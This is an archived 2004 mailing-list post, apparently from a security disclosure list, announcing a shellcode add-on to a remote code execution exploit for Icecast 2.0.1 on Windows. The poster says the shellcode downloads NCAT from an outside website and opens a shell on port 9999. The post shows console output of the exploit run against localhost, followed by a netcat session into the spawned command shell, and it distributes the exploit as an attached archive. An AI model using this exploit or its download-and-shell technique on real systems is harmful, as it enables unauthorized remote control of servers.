|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re:2. Code execution in Icecast 2.0.1(exploit with shellcode)
me
delikon.de
Date: Sat Oct 02 2004 - 04:47:37 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
i added a shellcode which downloads NCAT from www.elitehaven.net.
this ncat spwans a shell on port 9999
-------------------------------------------------------------------------
C:\>iceexec 127.0.0.1
Icecast <= 2.0.1 Win32 remote code execution 0.1
by Luigi Auriemma
e-mail: aluigi[at]altervista[d0t]org
web: http://aluigi.altervista.org
shellcode add-on by Delikon
www.delikon.de
- target 127.0.0.1:8000
- send malformed data
Server IS vulnerable!!!
C:\>nc 127.0.0.1 9999
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Icecast2 Win32>
---------------------------------------------------------------------------
best regards, Delikon
- application/octet-stream attachment: iceexec.rar
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]